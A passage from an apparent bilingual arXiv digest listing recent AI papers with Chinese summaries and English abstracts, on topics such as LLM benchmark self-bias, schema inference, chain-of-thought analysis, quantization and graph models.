随着LLM迅速饱和现有基准测试,使用LLM自动创建基准测试(LLM-as-a-benchmark)——即模型生成测试输入(LLM-as-a-testset)并评估输出(LLM-as-an-evaluator)——已成为人工策划的廉价替代方案。我们表明,这种范式存在一个根本问题:LLM生成的基准测试系统性地偏爱创建它们的模型。以机器翻译为主要测试平台,我们发现自我偏见源于两个叠加来源:LLM-as-a-testset和LLM-as-an-evaluator,它们的组合放大了这种效应。关键的是,即使测试数据在显式多样性控制下生成,每个模型的隐式风格倾向也会产生同质的、模型特定的输出,从而抬高其自身分数。使用我们提出的多样性度量增加源文本多样性,可以部分缓解这种偏见。自我偏见足够强,以至于每个模型都将自己排在首位,覆盖了同行共识排序。我们确认该现象扩展到Chatbot Arena任务上的开放式生成。

英文摘要

As LLMs rapidly saturate existing benchmarks, automated benchmark creation using LLMs (LLM-as-a-benchmark) -- where a model generates test inputs (LLM-as-a-testset) and evaluates outputs (LLM-as-an-evaluator) -- has gained traction as a cheap alternative to human curation. We show that this paradigm has a fundamental problem: LLM-generated benchmarks systematically favor the model that created them. Using machine translation as our primary testbed, we find that self-bias arises from two additive sources, LLM-as-a-testset and LLM-as-an-evaluator, and their combination amplifies the effect. Crucially, even when test data is generated with explicit diversity controls, each model's implicit stylistic tendencies produce homogeneous, model-specific outputs that inflate its own scores. Increasing source text diversity, using our proposed diversity metric, partially mitigates this bias. Self-bias is strong enough to cause each model to rank itself first, overriding the peer-consensus ordering. We confirm that the phenomenon extends to open-ended generation on the Chatbot Arena task.

2509.04632 2026-05-27 cs.DB cs.AI 版本更新

Conceptual Schema Inference for Tabular Datasets using Large Language Models

使用大型语言模型对表格数据集进行概念模式推断

Zhenyu Wu, Jiaoyan Chen, Norman W. Paton

发表机构 * The University of Manchester(曼彻斯特大学)

AI总结 本文提出两种基于大型语言模型的方法,从原始表格中自动推断概念模式,包括实体类型、属性和类型间关系,以解决异构表格数据的一致性问题。

详情
AI中文摘要

来自数据湖、网络表格和开放数据门户的大量表格数据通常源自异构源,导致表示不一致。因此,理解和组织此类存储库仍然是一个重大挑战。虽然先前的工作主要关注数据集发现和探索,但本文解决了概念模式推断的补充问题:自动从原始表格中推导出捕获实体类型、属性和类型间关系的概念模式。我们提出了两种基于大型语言模型(LLM)的方法,仅使用列标题和单元格值:GeSI使用生成式LLM从表格和列级语义推断层次化类型及其属性,并将它们集成到全局模式中,该模式还捕获跨类型的关系;EmSI使用基于LLM的表格嵌入按列级语义对表格进行分组,推断每组内的属性,并从共享属性模式构建层次结构。最后,我们报告了一项实验分析,展示了我们的方法在推断模式组件的简洁性和结构质量、对大型存储库的可扩展性方面的有效性,以及一个说明端到端模式推断的案例研究。

英文摘要

Large collections of tabular data from data lakes, web tables and open data portals often originate from heterogeneous sources, leading to representational inconsistencies. Understanding and organizing such repositories therefore remains a major challenge. While prior work has primarily focused on dataset discovery and exploration, this paper addresses the complementary problem of conceptual schema inference: automatically deriving a conceptual schema that captures entity types, attributes and inter-type relationships directly from raw tables. We propose two large language model (LLM)-based approaches that use only column headers and cell values: GeSI uses generative LLMs to infer hierarchical types and their attributes from table- and column-level semantics, and to integrate them into a global schema that also captures relationships across types; EmSI employs LLM-based table embeddings to group tables by column-level semantics, infer attributes within each group, and construct hierarchical structures from shared attribute patterns. Finally, we report an experimental analysis demonstrating the effectiveness of our approaches in terms of the conciseness and structural quality of the inferred schema components, their scalability to large repositories, and a case study illustrating end-to-end schema inference.

2508.18444 2026-05-27 cs.CL cs.AI 版本更新

How Reliable are LLMs for Reasoning on the Re-ranking task?

LLMs在重排序任务上的推理有多可靠?

Nafis Tanveer Islam, Zhiming Zhao

发表机构 * Multiscale Networked Systems (MNS) Group, University of Amsterdam(多尺度网络系统(MNS)组,阿姆斯特丹大学)

AI总结 本研究分析不同训练方法对LLMs在重排序任务中语义理解的影响,并探究模型能否生成更知情的文本推理以克服透明度和数据有限的挑战。

Comments This chapter has been published in Advancements in AI From Foundations to Cross-Disciplinary Applications, Springer, 2026

详情
AI中文摘要

随着大型语言模型(LLMs)语义理解能力的提升,它们表现出对人类更高的认知和一致性,但这以牺牲透明度为代价。尽管通过实验分析取得了有希望的结果,但深入理解LLM的内部工作机制对于理解重排序背后的推理是不可避免的,这为最终用户提供了解释,使他们能够做出明智的决定。此外,在新开发的系统中,用户参与有限且排序数据不足,准确地对内容进行重排序仍然是一个重大挑战。虽然各种训练方法影响LLMs的训练并生成推理,但我们的分析发现,一些训练方法比其他方法表现出更好的可解释性,这意味着并非所有训练方法都学到了准确的语义理解;相反,获得了抽象知识以优化评估,这引发了对LLMs真正可靠性的质疑。因此,在这项工作中,我们分析了不同训练方法如何影响LLMs在重排序任务中的语义理解,并调查这些模型是否能够生成更知情的文本推理,以克服透明度或LLMs以及有限训练数据的挑战。为了分析用于重排序任务的LLMs,我们利用来自环境和地球科学领域的相对较小的排序数据集来对检索到的内容进行重排序。此外,我们还分析了可解释信息,以查看是否可以使用可解释性对重排序进行推理。

英文摘要

With the improving semantic understanding capability of Large Language Models (LLMs), they exhibit a greater awareness and alignment with human values, but this comes at the cost of transparency. Although promising results are achieved via experimental analysis, an in-depth understanding of the LLM's internal workings is unavoidable to comprehend the reasoning behind the re-ranking, which provides end users with an explanation that enables them to make an informed decision. Moreover, in newly developed systems with limited user engagement and insufficient ranking data, accurately re-ranking content remains a significant challenge. While various training methods affect the training of LLMs and generate inference, our analysis has found that some training methods exhibit better explainability than others, implying that an accurate semantic understanding has not been learned through all training methods; instead, abstract knowledge has been gained to optimize evaluation, which raises questions about the true reliability of LLMs. Therefore, in this work, we analyze how different training methods affect the semantic understanding of the re-ranking task in LLMs and investigate whether these models can generate more informed textual reasoning to overcome the challenges of transparency or LLMs and limited training data. To analyze the LLMs for re-ranking tasks, we utilize a relatively small ranking dataset from the environment and the Earth science domain to re-rank retrieved content. Furthermore, we also analyze the explainable information to see if the re-ranking can be reasoned using explainability.

2504.08593 2026-05-27 cs.CV cs.AI 版本更新

Hands-On: Segmenting Individual Signs from Continuous Sequences

动手实践:从连续序列中分割单个手势

JianHe Low, Harry Walsh, Ozge Mercanoglu Sincan, Richard Bowden

发表机构 * CVSSP, University of Surrey(CVSSP,萨里大学)

AI总结 针对连续手语分割难题,提出基于Transformer的架构,利用HaMeR手部特征和3D角度,采用BIO标注方案建模时序动态,在DGS语料库上达到最优性能。

Comments Accepted in the 19th IEEE International Conference on Automatic Face and Gesture Recognition. Code Implementation Released

详情
Journal ref
IEEE 19th International Conference on Automatic Face and Gesture Recognition. (2025) 1-5
AI中文摘要

这项工作解决了连续手语分割的挑战,这是一项对手语翻译和数据标注具有重大影响的关键任务。我们提出了一种基于Transformer的架构,该架构对手语的时序动态进行建模,并使用开始-内部-外部(BIO)标注方案将分割视为序列标注问题。我们的方法利用了HaMeR手部特征,并辅以3D角度。大量实验表明,我们的模型在DGS语料库上取得了最先进的结果,而我们的特征在BSLCorpus上超越了先前的基准。

英文摘要

This work tackles the challenge of continuous sign language segmentation, a key task with huge implications for sign language translation and data annotation. We propose a transformer-based architecture that models the temporal dynamics of signing and frames segmentation as a sequence labeling problem using the Begin-In-Out (BIO) tagging scheme. Our method leverages the HaMeR hand features, and is complemented with 3D Angles. Extensive experiments show that our model achieves state-of-the-art results on the DGS Corpus, while our features surpass prior benchmarks on BSLCorpus.

2508.00748 2026-05-27 cs.CV cs.AI cs.CR cs.MM 版本更新

Is It Really You? Exploring Biometric Verification Scenarios in Photorealistic Talking-Head Avatar Videos

真的是你吗?探索逼真说话头像视频中的生物特征验证场景

Laura Pedrouzo-Rodriguez, Pedro Delgado-DeRobles, Luis F. Gomez, Ruben Tolosana, Ruben Vera-Rodriguez, Aythami Morales, Julian Fierrez

发表机构 * Biometrics and Data Pattern Analytics Lab(生物特征与数据模式分析实验室)

AI总结 本文研究在逼真说话头像视频中,利用面部运动模式作为行为生物特征进行身份验证,提出基于图卷积网络的轻量级模型,AUC接近80%。

Comments Accepted at the IEEE International Joint Conference on Biometrics (IJCB 2025)

详情
Journal ref
2025 IEEE International Joint Conference on Biometrics (IJCB)
AI中文摘要

逼真说话头像在虚拟会议、游戏和社交平台中越来越常见。这些头像允许更沉浸式的交流,但也引入了严重的安全风险。一个新兴威胁是冒充:攻击者可以窃取用户的头像,保留其外观和声音,使得仅凭视觉或听觉几乎无法检测欺诈性使用。在本文中,我们探讨了在这种头像中介场景中生物特征验证的挑战。我们的主要问题是,当头像的视觉外观是其主人的复制品时,个体的面部运动模式能否作为可靠的行为生物特征来验证其身份。为了回答这个问题,我们引入了一个新的数据集,其中包含使用最先进的一次性头像生成模型GAGAvatar创建的逼真头像视频,包括真实和冒充的头像视频。我们还提出了一种轻量级、可解释的时空图卷积网络架构,具有时间注意力池化,仅使用面部标志点来建模动态面部手势。实验结果表明,面部运动线索能够实现有意义的身份验证,AUC值接近80%。所提出的基准和生物特征系统可供研究社区使用,以引起对基于头像的通信系统中更高级行为生物特征防御的迫切需求的关注。

英文摘要

Photorealistic talking-head avatars are becoming increasingly common in virtual meetings, gaming, and social platforms. These avatars allow for more immersive communication, but they also introduce serious security risks. One emerging threat is impersonation: an attacker can steal a user's avatar, preserving his appearance and voice, making it nearly impossible to detect its fraudulent usage by sight or sound alone. In this paper, we explore the challenge of biometric verification in such avatar-mediated scenarios. Our main question is whether an individual's facial motion patterns can serve as reliable behavioral biometrics to verify their identity when the avatar's visual appearance is a facsimile of its owner. To answer this question, we introduce a new dataset of realistic avatar videos created using a state-of-the-art one-shot avatar generation model, GAGAvatar, with genuine and impostor avatar videos. We also propose a lightweight, explainable spatio-temporal Graph Convolutional Network architecture with temporal attention pooling, that uses only facial landmarks to model dynamic facial gestures. Experimental results demonstrate that facial motion cues enable meaningful identity verification with AUC values approaching 80%. The proposed benchmark and biometric system are available for the research community in order to bring attention to the urgent need for more advanced behavioral biometric defenses in avatar-based communication systems.

2507.20758 2026-05-27 cs.AI 版本更新

How Chain-of-Thought Works? Tracing Information Flow from Decoding, Projection, and Activation

思维链如何工作?从解码、投影和激活追踪信息流

Hao Yang, Qinghua Zhao, Lei Li, Lingyi Meng, Mengda Yu

发表机构 * State Key Laboratory for Novel Software Technology, Nanjing University(南京大学新型软件技术国家重点实验室) School of Artificial Intelligence and Big Data, Hefei University(合肥大学人工智能与大数据学院) School of Artificial Intelligence, Beijing Institute of Technology(北京理工大学人工智能学院) School of Computing and Information, University of Pittsburgh(匹兹堡大学计算机与信息学院) Center for Biostatistics, The Ohio State University Wexner Medical Center(俄亥俄州立大学韦克斯纳医学中心生物统计中心)

AI总结 通过反向追踪解码、投影和激活阶段的信息流,揭示思维链作为解码空间剪枝器的作用,并发现其以任务依赖方式调节神经元激活。

Comments Accept by ACL 2026

详情
AI中文摘要

思维链提示显著增强了模型推理能力,但其内部机制仍知之甚少。我们通过反向追踪解码、投影和激活阶段的信息流来分析CoT的操作原理。我们的定量分析表明,CoT可能作为解码空间剪枝器,利用答案模板引导输出生成,更高的模板遵循度与性能提升强相关。此外,我们惊讶地发现CoT以任务依赖方式调节神经元参与:在开放领域任务中减少神经元激活,而在封闭领域场景中增加激活。这些发现提供了一个新颖的机制可解释性框架,并为实现有针对性的CoT干预以设计更高效和鲁棒的提示提供了关键见解。我们在https://anonymous.4open.science/r/cot-D247发布了代码和数据。

英文摘要

Chain-of-Thought (CoT) prompting significantly enhances model reasoning, yet its internal mechanisms remain poorly understood. We analyze CoT's operational principles by reversely tracing information flow across decoding, projection, and activation phases. Our quantitative analysis suggests that CoT may serve as a decoding space pruner, leveraging answer templates to guide output generation, with higher template adherence strongly correlating with improved performance. Furthermore, we surprisingly find that CoT modulates neuron engagement in a task-dependent manner: reducing neuron activation in open-domain tasks, yet increasing it in closed-domain scenarios. These findings offer a novel mechanistic interpretability framework and critical insights for enabling targeted CoT interventions to design more efficient and robust prompts. We released our code and data at https://anonymous.4open.science/r/cot-D247.

2506.21443 2026-05-27 cs.CL cs.AI 版本更新

Domain Knowledge-Enhanced LLMs for Fraud and Concept Drift Detection

领域知识增强的大语言模型用于欺诈和概念漂移检测

Ali Şenol, Garima Agrawal, Huan Liu

发表机构 * School of Computing and Augmented Intelligence (SCAI), Arizona State University (ASU)(计算与增强智能学院(SCAI),亚利桑那州立大学) Department of Computer Engineering, Tarsus University(计算机工程系,塔鲁斯大学) Minerva CQ and HumaConn AI Consulting(Minerva CQ和HumaConn人工智能咨询) School of Computing and Augmented Intelligence (SCAI), Arizona State University(计算与增强智能学院(SCAI),亚利桑那州立大学)

AI总结 提出一种领域知识增强的大语言模型框架,通过集成结构化领域知识和漂移检测单元,实现高准确率的欺诈对话检测和概念漂移分类。

详情
AI中文摘要

在动态平台上检测欺骗性对话变得越来越困难,原因是语言模式的演变和概念漂移(CD)——即随着时间推移,语义或主题的转变会改变交互的上下文或意图。这些转变可能掩盖恶意意图或模仿正常对话,使得准确分类具有挑战性。尽管大语言模型(LLMs)在自然语言任务中表现出色,但在风险敏感场景中,它们常常面临上下文模糊和幻觉问题。为了解决这些挑战,我们提出了一个领域知识(DK)增强的LLM框架,该框架将预训练的LLM与结构化的、任务特定的见解相结合,以执行欺诈和概念漂移检测。所提出的架构由三个主要组件组成:(1)一个DK-LLM模块,用于检测虚假或欺骗性对话;(2)一个漂移检测单元(OCDD),用于判断是否发生了语义转变;(3)第二个DK-LLM模块,用于将漂移分类为良性或欺诈性。我们首先使用虚假评论数据集验证领域知识的价值,然后将我们的完整框架应用于SEConvo,一个包含多种欺诈和垃圾攻击的多轮对话数据集。结果表明,我们的系统能够高精度地检测虚假对话,并有效分类漂移的性质。在结构化提示的引导下,基于LLaMA的实现达到了98%的分类准确率。与零样本基线的对比研究表明,在高风险NLP应用中,融入领域知识和漂移意识显著提高了性能、可解释性和鲁棒性。

英文摘要

Detecting deceptive conversations on dynamic platforms is increasingly difficult due to evolving language patterns and Concept Drift (CD)-i.e., semantic or topical shifts that alter the context or intent of interactions over time. These shifts can obscure malicious intent or mimic normal dialogue, making accurate classification challenging. While Large Language Models (LLMs) show strong performance in natural language tasks, they often struggle with contextual ambiguity and hallucinations in risk-sensitive scenarios. To address these challenges, we present a Domain Knowledge (DK)-Enhanced LLM framework that integrates pretrained LLMs with structured, task-specific insights to perform fraud and concept drift detection. The proposed architecture consists of three main components: (1) a DK-LLM module to detect fake or deceptive conversations; (2) a drift detection unit (OCDD) to determine whether a semantic shift has occurred; and (3) a second DK-LLM module to classify the drift as either benign or fraudulent. We first validate the value of domain knowledge using a fake review dataset and then apply our full framework to SEConvo, a multiturn dialogue dataset that includes various types of fraud and spam attacks. Results show that our system detects fake conversations with high accuracy and effectively classifies the nature of drift. Guided by structured prompts, the LLaMA-based implementation achieves 98% classification accuracy. Comparative studies against zero-shot baselines demonstrate that incorporating domain knowledge and drift awareness significantly improves performance, interpretability, and robustness in high-stakes NLP applications.

2506.17633 2026-05-27 cs.CV cs.AI 版本更新

Adaptive Multi-prompt Contrastive Network for Few-shot Out-of-distribution Detection

自适应多提示对比网络用于少样本分布外检测

Xiang Fang, Arvind Easwaran, Blaise Genest

发表机构 * College of Computing and Data Science, Nanyang Technological University, Singapore(南洋理工大学计算机学院和数据科学学院,新加坡)

AI总结 针对少样本分布外检测问题,提出自适应多提示对比网络(AMCN),通过CLIP学习可学习文本提示和类间/类内分布,实现ID-OOD分离边界自适应。

Comments Published in ICML 2025

详情
AI中文摘要

分布外(OOD)检测旨在区分异常样本,以防止在分布内(ID)数据集上训练的模型产生不可用的输出。大多数OOD检测方法需要大量IID样本进行训练,这严重限制了它们的实际应用。为此,我们针对一个具有挑战性的场景:少样本OOD检测,其中只有少量标记的ID样本可用。因此,少样本OOD检测比传统的OOD检测设置更具挑战性。先前的少样本OOD检测工作忽略了不同类别之间的显著多样性。在本文中,我们提出了一种新颖的网络:自适应多提示对比网络(AMCN),它通过学习类间和类内分布来适应ID-OOD分离边界。为了弥补OOD的缺失和ID图像样本的稀缺,我们利用CLIP连接文本与图像,设计可学习的ID和OOD文本提示。具体来说,我们首先生成自适应提示(可学习ID提示、标签固定OOD提示和标签自适应OOD提示)。然后,我们通过引入类级阈值为每个类生成自适应类边界。最后,我们提出一个提示引导的ID-OOD分离模块来控制ID和OOD提示之间的间隔。实验结果表明,AMCN优于其他最先进的工作。

英文摘要

Out-of-distribution (OOD) detection attempts to distinguish outlier samples to prevent models trained on the in-distribution (ID) dataset from producing unavailable outputs. Most OOD detection methods require many IID samples for training, which seriously limits their real-world applications. To this end, we target a challenging setting: few-shot OOD detection, where {Only a few {\em labeled ID} samples are available.} Therefore, few-shot OOD detection is much more challenging than the traditional OOD detection setting. Previous few-shot OOD detection works ignore the distinct diversity between different classes. In this paper, we propose a novel network: Adaptive Multi-prompt Contrastive Network (AMCN), which adapts the ID-OOD separation boundary by learning inter- and intra-class distribution. To compensate for the absence of OOD and scarcity of ID {\em image samples}, we leverage CLIP, connecting text with images, engineering learnable ID and OOD {\em textual prompts}. Specifically, we first generate adaptive prompts (learnable ID prompts, label-fixed OOD prompts and label-adaptive OOD prompts). Then, we generate an adaptive class boundary for each class by introducing a class-wise threshold. Finally, we propose a prompt-guided ID-OOD separation module to control the margin between ID and OOD prompts. Experimental results show that AMCN outperforms other state-of-the-art works.

2506.10225 2026-05-27 cs.SD cs.AI eess.AS 版本更新

Genre Controlled Music Generation via Activation Steering

通过激活引导实现体裁控制的音乐生成

Swathi Narashiman, Pranay Mathur, Dipanshu Panda, Jayden Koshy Joe, Harshith M R, Anish Veerakumar, Aniruddh Krishna, Keerthiharan A

发表机构 * Indian Institute of Technology Madras(印度理工学院马德拉斯学院)

AI总结 提出一种在推理时对自回归生成模型MusicGen进行干预的方法,利用线性探针权重引导残差流,实现细粒度的体裁控制。

详情
AI中文摘要

计算音乐生成正朝着非传统风格发展,需要能够精确且可控地融合不同音乐元素的方法。在这项工作中,我们提出了一种方法,通过对自回归生成变换器MusicGen进行推理时干预来实现细粒度控制。通过我们的方法,我们利用线性探针在残差流上的权重来引导残差流,从而实现体裁控制。通过将激活引导视为一种人类可控的交互,我们的工作突出了可解释的模型行为如何在协同创作的音乐生成中发挥作用。展示我们方法的音频样本可在我们的演示页面上找到。

英文摘要

Computational Music Generation is evolving towards non-conventional styles, demanding methods that enable precise and controllable blending of diverse music elements. In this work, we present a method for fine grained control using inference-time interventions on an autoregressive generative transformer, MusicGen. Through our approach, we achieve genre control by steering the residual stream using weights of a linear probe on it. By framing activation steering as a human-controllable interaction, our work highlights how interpretable model behaviors can empower in co-creative music generation.Audio samples demonstrating our method are available on our demo page.

2506.07813 2026-05-27 cs.CV cs.AI 版本更新

Self-Cascaded Diffusion Models for Arbitrary-Scale Image Super-Resolution

自级联扩散模型用于任意尺度图像超分辨率

Junseo Bang, Joonhee Lee, Kyeonghyun Lee, Haechang Lee, Dong Un Kang, Se Young Chun

发表机构 * Department of Electrical and Computer Engineering (ECE), Seoul National University(电气电子工程系(ECE),首尔国立大学) Institute of New Media and Communications (INMC) & Interdisciplinary Program in AI (IPAI), Seoul National University(新媒体与通讯研究所(INMC)及人工智能跨学科项目(IPAI),首尔国立大学)

AI总结 提出自级联扩散框架CasArbi,通过将任意缩放因子分解为连续小步骤,逐步提升分辨率并保持尺度一致性,在感知和失真指标上优于现有方法。

详情
AI中文摘要

任意尺度图像超分辨率旨在将图像上采样到任意期望分辨率,比传统固定尺度超分辨率提供更大灵活性。最近基于回归或生成模型的方法显示出有希望的结果,但由于其单阶段公式必须同时处理大范围的缩放因子,常常遭受尺度不一致的问题。为了解决这个问题,我们提出了CasArbi,一个用于任意尺度图像超分辨率的自级联扩散框架。CasArbi将不同的缩放因子分解为更小的顺序步骤,逐步提升图像分辨率,并在每一步实现任意尺度的无缝过渡。CasArbi利用坐标条件扩散模型学习连续图像表示,并在推理时采用自一致性指导生成尺度一致的细节。大量实验表明,CasArbi在感知和失真指标上均优于现有方法,并在各种任意尺度超分辨率基准上展现出卓越的尺度一致性。我们的代码可在https://github.com/junseo88/CasArbi获取。

英文摘要

Arbitrary-scale image super-resolution aims to upsample images to any desired resolution, offering greater flexibility than traditional fixed-scale super-resolution. Recent approaches based on regression-based or generative models have shown promising results but often suffer from scale inconsistency due to their single-stage formulation, which must handle a wide range of scaling factors simultaneously. To address this, we propose CasArbi, a self-cascaded diffusion framework for arbitrary-scale image super-resolution. CasArbi decomposes varying scaling factors into smaller sequential steps, progressively enhancing the image resolution at each step with seamless transitions for arbitrary scales. CasArbi leverages a coordinate-conditioned diffusion model for learning continuous image representations and adopts self-consistency guidance to generate scale-consistent details at inference time. Extensive experiments show that CasArbi outperforms existing methods in both perceptual and distortion metrics and demonstrates superior scale consistency across diverse arbitrary-scale super-resolution benchmarks. Our code is available at https://github.com/junseo88/CasArbi.

2502.06963 2026-05-27 cs.LG cs.AI cs.DC cs.MA 版本更新

Intelligent Offloading in Vehicular Edge Computing: A Comprehensive Review of Deep Reinforcement Learning Approaches and Architectures

车辆边缘计算中的智能卸载:深度强化学习方法与架构综述

Ashab Uddin, Ahmed Hamdi Sakr, Ning Zhang

发表机构 * Department of Electrical and Computer Engineering, University of Windsor(滑铁卢大学电气与计算机工程系)

AI总结 本文综述了基于深度强化学习的车辆边缘计算卸载方法,分类比较了学习范式、系统架构和优化目标,并分析了马尔可夫决策过程的应用及未来研究方向。

Comments 33 Pages, 6 Figures, 7 Tables. Machine Learning, Reinforcement Learning, Multi Agent Reinforcement Learning, Computational Offloading and Edge Computing

详情
AI中文摘要

智能交通系统(ITS)日益复杂,导致对计算卸载到边缘服务器、车辆节点和无人机等外部基础设施的兴趣显著增加。这些动态异构环境给传统卸载策略带来了挑战,促使人们探索强化学习(RL)和深度强化学习(DRL)作为自适应决策框架。本综述全面回顾了基于DRL的车辆边缘计算(VEC)卸载的最新进展。我们根据学习范式(如单智能体、多智能体)、系统架构(如集中式、分布式、分层式)和优化目标(如延迟、能量、公平性)对现有工作进行分类和比较。此外,我们分析了马尔可夫决策过程(MDP)公式的应用方式,并强调了奖励设计、协调机制和可扩展性方面的新兴趋势。最后,我们确定了开放挑战,并概述了未来研究方向,以指导下一代ITS鲁棒且智能的卸载策略的开发。

英文摘要

The increasing complexity of Intelligent Transportation Systems (ITS) has led to significant interest in computational offloading to external infrastructures such as edge servers, vehicular nodes, and UAVs. These dynamic and heterogeneous environments pose challenges for traditional offloading strategies, prompting the exploration of Reinforcement Learning (RL) and Deep Reinforcement Learning (DRL) as adaptive decision-making frameworks. This survey presents a comprehensive review of recent advances in DRL-based offloading for vehicular edge computing (VEC). We classify and compare existing works based on learning paradigms (e.g., single-agent, multi-agent), system architectures (e.g., centralized, distributed, hierarchical), and optimization objectives (e.g., latency, energy, fairness). Furthermore, we analyze how Markov Decision Process (MDP) formulations are applied and highlight emerging trends in reward design, coordination mechanisms, and scalability. Finally, we identify open challenges and outline future research directions to guide the development of robust and intelligent offloading strategies for next-generation ITS.

2506.03627 2026-05-27 cs.CL cs.AI 版本更新

Robustness of Prompting: Enhancing Robustness of Large Language Models Against Prompting Attacks

提示的鲁棒性:增强大型语言模型对抗提示攻击的鲁棒性

Lin Mu, Guowei Chu, Li Ni, Lei Sang, Yiwen Zhang

发表机构 * School of Computer Science and Technology, Anhui University(安徽大学计算机科学与技术学院)

AI总结 提出RoP(提示鲁棒性)策略,通过错误校正和引导两个阶段,增强LLM对输入扰动的鲁棒性,在算术、常识和逻辑推理任务上显著提升性能。

Comments Accepted by IEEE Transactions on Artificial Intelligence

详情
AI中文摘要

大型语言模型(LLM)通过有效利用提示策略在各种任务中展现了卓越的性能。然而,它们对输入扰动高度敏感,例如拼写错误或轻微字符顺序错误,这些扰动会显著损害其性能。尽管在提示技术方面取得了进展,如思维链和自动提示生成,但开发一种明确减轻此类扰动负面影响的提示策略仍然是一个开放的挑战。为弥补这一差距,我们提出了提示鲁棒性(RoP),一种旨在增强LLM鲁棒性的新型提示策略。RoP包括两个阶段:错误校正和引导。在错误校正阶段,RoP应用多种扰动方法生成对抗样本,用于生成自动纠正输入错误的提示。在引导阶段,RoP基于校正后的输入生成最优引导提示,引导模型生成更鲁棒和准确的推理。通过在算术、常识和逻辑推理任务上的全面实验,我们证明RoP显著提高了LLM对抗对抗扰动的鲁棒性。至关重要的是,与干净输入场景相比,它仅以最小的精度下降保持了模型准确性,从而将RoP确立为在实际应用中增强LLM鲁棒性的实用且有效的方法。

英文摘要

Large Language Models (LLMs) have demonstrated remarkable performance across various tasks by effectively utilizing a prompting strategy. However, they are highly sensitive to input perturbations, such as typographical errors or slight character order errors, which can significantly impair their performance. Despite advances in prompting techniques such as Chain-of-Thought and automatic prompt generation, developing a prompting strategy that explicitly mitigates the negative impact of such perturbations remains an open challenge. To bridge this gap, we propose Robustness of Prompting (RoP), a novel prompting strategy aimed at enhancing the robustness of LLMs. RoP consists of two stages: Error Correction and Guidance. In the Error Correction stage, RoP applies diverse perturbation methods to generate adversarial examples, which are used to generate prompts that correct input errors automatically. In the Guidance stage, RoP generates an optimal guidance prompt based on the corrected input, guiding the model to generate more robust and accurate inferences. Through comprehensive experiments spanning arithmetic, commonsense, and logical reasoning tasks, we demonstrate that RoP significantly improves LLMs' robustness against adversarial perturbations. Crucially, it preserves model accuracy with only minimal degradation compared to clean input scenarios, thereby establishing RoP as a practical and effective approach for enhancing LLM robustness in real-world applications.

2411.02355 2026-05-27 cs.LG cs.AI 版本更新

"Give Me BF16 or Give Me Death"? Accuracy-Performance Trade-Offs in LLM Quantization

“给我BF16,否则给我死亡”?LLM量化中的精度-性能权衡

Eldar Kurtic, Alexandre Marques, Shubhra Pandit, Mark Kurtz, Dan Alistarh

发表机构 * Red Hat AI(红帽AI) Institute of Science and Technology Austria(奥地利科学与技术研究院)

AI总结 本文通过超过50万次评估,全面研究了FP8、INT8和INT4量化在Llama-3.1模型族上的精度-性能权衡,发现FP8无损、INT8精度损失低、INT4权重仅量化具有竞争力,并基于vLLM框架给出了不同部署场景下的最优量化格式建议。

Comments Accepted to ACL 2025

详情
AI中文摘要

量化是加速大型语言模型(LLM)推理的强大工具,但不同格式下的精度-性能权衡仍不明确。在本文中,我们进行了迄今为止最全面的实证研究,评估了FP8、INT8和INT4量化在整个Llama-3.1模型族上的学术基准和实际任务。通过超过50万次评估,我们的研究得出了几个关键发现:(1)FP8(W8A8-FP)在所有模型规模上均无损;(2)良好调优的INT8(W8A8-INT)实现了令人惊讶的低精度下降(1-3%);(3)INT4权重仅量化(W4A16-INT)比预期更具竞争力,可与8位量化相媲美。此外,我们通过流行的vLLM框架分析推理性能,研究了不同部署场景下的最优量化格式。我们的分析提供了明确的部署建议:W4A16是同步设置中最具成本效益的,而W8A8在异步连续批处理中占主导地位。对于混合工作负载,最优选择取决于具体用例。我们的发现为大规模部署量化LLM提供了实用的、数据驱动的指导——确保速度、效率和精度之间的最佳平衡。

英文摘要

Quantization is a powerful tool for accelerating large language model (LLM) inference, but the accuracy-performance trade-offs across different formats remain unclear. In this paper, we conduct the most comprehensive empirical study to date, evaluating FP8, INT8, and INT4 quantization across academic benchmarks and real-world tasks on the entire Llama-3.1 model family. Through over 500,000 evaluations, our investigation yields several key findings: (1) FP8 (W8A8-FP) is effectively lossless across all model scales, (2) well-tuned INT8 (W8A8-INT) achieves surprisingly low (1-3\%) accuracy degradation, and (3) INT4 weight-only (W4A16-INT) is more competitive than expected, rivaling 8-bit quantization. Further, we investigate the optimal quantization format for different deployments by analyzing inference performance through the popular vLLM framework. Our analysis provides clear deployment recommendations: W4A16 is the most cost-efficient for synchronous setups, while W8A8 dominates in asynchronous continuous batching. For mixed workloads, the optimal choice depends on the specific use case. Our findings offer practical, data-driven guidelines for deploying quantized LLMs at scale -- ensuring the best balance between speed, efficiency, and accuracy.

2505.18728 2026-05-27 cs.LG cs.AI 版本更新

Message-Passing State-Space Models: Improving Graph Learning with Modern Sequence Modeling

消息传递状态空间模型:利用现代序列建模改进图学习

Andrea Ceni, Alessio Gravina, Claudio Gallicchio, Davide Bacciu, Carola-Bibiane Schonlieb, Moshe Eliasof

发表机构 * University of Pisa(帕尔米斯大学) University of Cambridge(剑桥大学)

AI总结 提出MP-SSM,将现代状态空间模型的核心计算嵌入消息传递神经网络,实现静态和时序图上的高效、置换等变和长程信息传播,并通过精确敏感性分析刻画深层信息流问题。

详情
AI中文摘要

状态空间模型(SSM)在序列建模中的近期成功推动了其向图学习的迁移,催生了图状态空间模型(GSSM)。然而,现有的GSSM通过将SSM模块应用于从图中提取的序列,往往损害了置换等变性、消息传递兼容性和计算效率等核心属性。本文引入了一种新视角,将现代SSM计算的关键原理直接嵌入消息传递神经网络框架,从而为静态图和时序图提供统一的方法论。我们的方法MP-SSM能够实现高效、置换等变和长程信息传播,同时保持消息传递的架构简洁性。关键的是,MP-SSM支持精确的敏感性分析,我们利用该分析从理论上刻画信息流,并评估深层网络中的梯度消失和过压缩等问题。此外,我们的设计选择允许类似现代SSM的高度优化并行实现。我们在包括节点分类、图属性预测、长程基准和时空预测在内的广泛任务上验证了MP-SSM,展示了其多功能性和强大的实证性能。

英文摘要

The recent success of State-Space Models (SSMs) in sequence modeling has motivated their adaptation to graph learning, giving rise to Graph State-Space Models (GSSMs). However, existing GSSMs operate by applying SSM modules to sequences extracted from graphs, often compromising core properties such as permutation equivariance, message-passing compatibility, and computational efficiency. In this paper, we introduce a new perspective by embedding the key principles of modern SSM computation directly into the Message-Passing Neural Network framework, resulting in a unified methodology for both static and temporal graphs. Our approach, MP-SSM, enables efficient, permutation-equivariant, and long-range information propagation while preserving the architectural simplicity of message passing. Crucially, MP-SSM enables an exact sensitivity analysis, which we use to theoretically characterize information flow and evaluate issues like vanishing gradients and over-squashing in the deep regime. Furthermore, our design choices allow for a highly optimized parallel implementation akin to modern SSMs. We validate MP-SSM across a 